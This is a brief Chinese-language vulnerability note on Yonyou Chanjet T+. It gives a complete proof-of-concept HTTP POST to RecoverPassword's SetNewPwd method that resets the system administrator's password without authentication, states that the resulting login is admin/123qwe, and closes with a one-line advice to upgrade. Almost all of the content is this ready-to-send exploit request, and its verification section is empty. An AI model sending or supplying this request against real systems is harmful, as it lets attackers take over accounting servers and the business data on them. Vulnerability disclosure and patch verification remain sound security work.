漏洞验证-用友畅捷通T+ 密码重置漏洞

一、漏洞描述

用友畅捷通T+ RecoverPassword.aspx存在未经授权的管理员密码修改漏洞。攻击者可以利用该漏洞修改管理员账户密码来登录后台。

二、POC

POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
Accept: */*
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}

 

重置系统管理员账号密码为：admin/123qwe

三、漏洞验证

四、整改建议

联系官方升级至最新版本